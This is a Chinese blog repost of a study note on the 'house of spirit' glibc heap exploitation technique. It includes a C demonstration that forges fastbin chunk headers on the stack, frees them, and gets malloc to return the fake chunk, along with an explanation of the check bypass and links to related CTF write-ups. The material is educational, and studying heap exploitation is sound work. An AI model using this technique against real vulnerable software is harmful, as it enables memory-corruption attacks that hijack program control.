6.house_of_spirit

最新推荐文章于 2024-02-05 11:36:00 发布
最新推荐文章于 2024-02-05 11:36:00 发布
阅读量133 收藏
点赞数
原文链接:http://www.cnblogs.com/pfcode/p/10991531.html
版权

源代码

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 
 4 int main()
 5 {
 6     fprintf(stderr, "This file demonstrates the house of spirit attack.\n");
 7 
 8     fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
 9     malloc(1);
10 
11     fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
12     unsigned long long *a;
13     // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
14     unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
15 
16     fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]);
17 
18     fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
19     fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
20     fake_chunks[1] = 0x40; // this is the size
21 
22     fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
23         // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
24     fake_chunks[9] = 0x1234; // nextsize
25 
26     fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
27     fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
28     a = &fake_chunks[2];
29 
30     fprintf(stderr, "Freeing the overwritten pointer.\n");
31     free(a);
32 
33     fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
34     fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
35 }

运行结果

首先用数组形式申请了一块0x40大小的内存

修改成如下

1 0x00          0x0000000000000000       0x0000000000000040
2 0x10          0x0000000000000000       0x0000000000000000
3 0x20          0x0000000000000000       0x0000000000000000
4 0x30          0x0000000000000000       0x0000000000000000
5 0x40          0x0000000000000000       0x0000000000001234

在0x00到0x40遍伪造成了一个0x30+0x10大小的堆

之后又伪造了一个堆头部,size为0x1234 符合(>16b && <128kb)绕过检测

之后释放伪造的堆,即会进入0x40的fastbin

之后再申请0x30大小的堆,即会分配到这块伪造的堆

这里要注意的是大小要符合fastbin,还要修改相邻的下一块堆的size大小符合(>16b && <128kb)来绕过检测。

 

转载于:https://www.cnblogs.com/pfcode/p/10991531.html

aaa15893831716
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn工具箱之house of spirit
jmp esp
07-03 918
house of spirit基本信息 利用种类:堆利用 堆利用种类:释放fake chunk 利用思路:通过构造fake chunk,然后使得fake chunk被free,在下一次malloc时返回fake chunk 利用难点 需要能够控制被free的内容,才能构造fake chunk 在free fake chunk的时候,libc会检查next size,也就是从当前位置开始算,加上一个c
[pwn][堆利用]house of spirit[例题:lctf2016_pwn200]
zhulintintao的博客
11-21 788
House of spirit 实现目的 malloc分配到目标地址 实现条件 free的参数可控 目标地址可以连续构造两个fake chunksize域,需要地址对齐(即目标高低地址处均有可控区域) 实现方法 在目标地址伪造可以被释放到fastbin上的fake chunk 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域 将目标地址作为参数free malloc一次,将返回指向目标地址的指针 实现实例 题目平台 buuctf 题目名
House of Spirit(fastbin)
weixin_30265171的博客
07-14 156
0x01 fastbin fastbin所包含chunk的大小为16 Bytes, 24 Bytes, 32 Bytes, … , 80 Bytes。当分配一块较小的内存(mem<=64 Bytes)时,会首先检查对应大小的fastbin中是否包含未被使用的chunk,如果存在则直接将其从fastbin中移除并返回;否则通过其他方式(剪切top chunk)得到一块符合大小要求的chunk...
【PWN-HEAP学习】House of Spirit 学习笔记
SWEET0SWAT的博客
08-16 1346
House of Spirit 原理 l-ctf 2016 pwn200 调试分析 0x7ffd4a390b10: 0x0000000000000031 0x0000003000000001 0x7ffd4a390b20: 0x00007ffd4a390b40 0x00000000004009ff 0x7ffd4a390b30: 0x0000000000000005 0x0000000188ff...
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1633
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
mobile.house_arrest:重写com.apple.mobile.house_arrest服务
05-26
mobile.house_arrest 重写...建造xcrun -sdk iphoneos clang house_arrest.m -o mobile_house_arrest -arch armv7 -arch arm64 -llockdown -lafc -lobjc -framework MobileCoreServices -framework CoreFoundation
jj.rar_house_jjdsw txt
09-19
【描述】"Hello occurrence of the sofa couch Stephen Safar manual valve is time to kill the Orient House" 这句话看起来不太符合标准的中文语句,可能是拼写错误或者是引用自某段英文内容。不过,我们可以从中...
CDMA.RF.rar_ARTECH HOUSE_house_rf
09-14
《CDMA RF System Engineering》是Artech House出版的一本关于无线通信领域中码分多址(Code Division Multiple Access, CDMA)射频系统工程的专业书籍。这本书深入探讨了CDMA技术在射频系统设计和实施中的关键概念...
system_of_house_measure.rar_house
09-21
《房屋测量系统详解》 在数字化时代,房屋测量已经不再局限于传统的实地测量工具,而是借助先进的计算机技术,形成了一套高效、精准的房屋测量系统。本文将深入探讨这个系统的基本构成,以及它如何集成地图软件要素...
LV.zip_house_labview
09-24
LV.zip_house_labview这个项目,显然是利用LabView进行的家庭安全系统的基础代码实现。在本文中,我们将深入探讨LabView的基础知识以及它如何被应用于构建家庭安全系统。 1. **LabView基础知识** - **图形化编程**...
house_of_spirit && 2014_hack.lu_oreo例题分析
Pwnpanda的博客
08-13 1226
2014_hack.lu_oreo 相关知识点: Fastbin Attack – House of Spirit 相关链接: 2014_hack.lu_oreo下载 CTF Wiki Fastbin Attack IDA创建结构体 题目分析: 先分析功能: ①添加枪支(add),这个地方会读取枪支的名字和描述,这是第一个难点,这个里面存在一个结构体(差点被坑死在这,为...
【PWN · heap | House Of Spirit】2014_hack.lu_oreo
最新发布
Mr_Fmnwon的博客
02-05 855
chunk劫持到指定位置,能够大有作为,而House Of Spirit的目的就是这一点。最初了解仅是了解,通过本题,对于利用手法的利用,感悟更为深入。House of Spirit 是中的一种技术。该技术的核心在于在目标位置处伪造 fastbin chunk,并将其释放,从而达到分配指定地址的 chunk 的目的。要想构造 fastbin fake chunk,并且将其释放时,可以将其放入到对应的 fastbin 链表中,需要绕过一些必要的检测,即。
House of Spirit学习调试验证与实践
xiaoi123的博客
08-07 1127
作家:Bug制造机 原文来自:House of Spirit学习调试验证与实践 House of Spirit和其他的堆的利用手段有所不同。它是将存在的指针改写指向我们伪造的块(这个块可以位于堆、栈、bss任何一个位置)并且free掉欺骗glibc达到把伪造块回收到bins中不过在free之前,需要设置当前伪造块和下一个伪造块的size字段,满足free()的安全检测机制,从而欺骗glibc。...
GDB调试堆漏洞之house of spirit
蚁景网安学院
06-25 426
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
linux 堆溢出学习之house of spirit(1) malloc maleficarum hos翻译
jmp esp
03-02 2247
综述house of spirit是一种常用的堆溢出技术,而在如今的malloc实现中依然没有对这种方法进行保护,所以在目前还是一种有效的堆溢出技术。下面我们先从这种方法的来源之本讲起,即2005 Malloc Maleficarumcsdn原文 The House of SpiritThe House of Spirit is primarily interesting because of th
2014 hack.lu oreo house of sprit
m0_57754423的博客
02-14 217
什么是house of spirit? 简单说一下我自己的理解,详细的可以看wiki。 其核心在于在一个任意可写或间接可写的位置伪造一个fake_chunk,然后通过释放该fake_chunk,即可将该fake_chunk连入fastbin中,通过malloc达到分配指定地址chunk的目的。 看道例题:2014 hack.lu oreo 漏洞点:存在堆溢出,chunk未完全free 利用思路: 1.泄露libc: add一个chunk,并且将该chunk的第13个地址位改为任意函数的g
fastbin attack
m0_64195960的博客
07-19 1396
FastbinDoubleFree是指fastbin的chunk可以被多次释放,因此可以在fastbin链表中存在多次。这样导致的后果是多次分配可以从fastbin链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆(typeconfused)的效果。FastbinDoubleFree能够成功利用主要有两部分的原因fastbin的堆块被释放后next_chunk的pre_inuse位不会被清空1.1.1该技术的核心。......
How2Heap笔记(三)
kelxLZ的博客
01-25 682
Author:ZERO-A-ONE Date:2021-01-22 一、house_of_spirit house-of-spirit 是一种 fastbins 攻击方法,通过构造 fake chunk,然后将其 free 掉,就可以在下一次 malloc 时返回 fake chunk 的地址,即任意我们可控的区域。house-of-spirit 是一种通过堆的 fast bin 机制来辅助栈溢出的方法,一般的栈溢出漏洞的利用都希望能够覆盖函数的返回地址以控制 EIP 来劫持控制流,但如果栈溢出的长度无.
linux 堆溢出学习之house of spirit(2)
jmp esp
03-02 948
开篇本篇接上篇的house of spirit技术的学习,上篇我们翻译了这个技术来源的文章,这篇我们将通过实例和总结来进行一个更深入的了解house of spirit 简介 攻击方式:结合栈溢出和堆溢出 攻击效果:返回任意位置作为一个chunk攻击要求: 可溢出控制某个malloc返回的地址 被控制的地址被free 再次malloc一个chunk 可对第二次分配的chunk进行输入 house o
SELECT a.comm_id, c.Title AS house_keeper_name, ( SELECT build.id FROM erp_base.tb_base_masterdata_resource AS resource INNER JOIN erp_base.tb_base_masterdata_resource AS unit ON unit.id = resource.parent_id INNER JOIN erp_base.tb_base_masterdata_resource AS build ON build.id = unit.parent_id WHERE resource.id = a.resource_id ) AS resource_group, b.resource_type FROM tb_charge_receipts_detail a LEFT JOIN erp_base.tb_base_masterdata_resource b ON a.resource_id = b.id LEFT JOIN erp_base.rf_dictionary c ON b.house_keeper = c.id GROUP BY a.comm_id, c.Title, resource_group, b.resource_type 在mysql中报SELECT list is not in GROUP BY clause and contains nonaggregated column 'erp_charge.a.resource_id' which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by 如何做sql的修改
06-09
SELECT a.comm_id, c.Title AS house_keeper_name, (SELECT build.id FROM erp_base.tb_base_masterdata_resource AS resource INNER JOIN erp_base.tb_base_masterdata_resource AS unit ON unit.id = resource...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值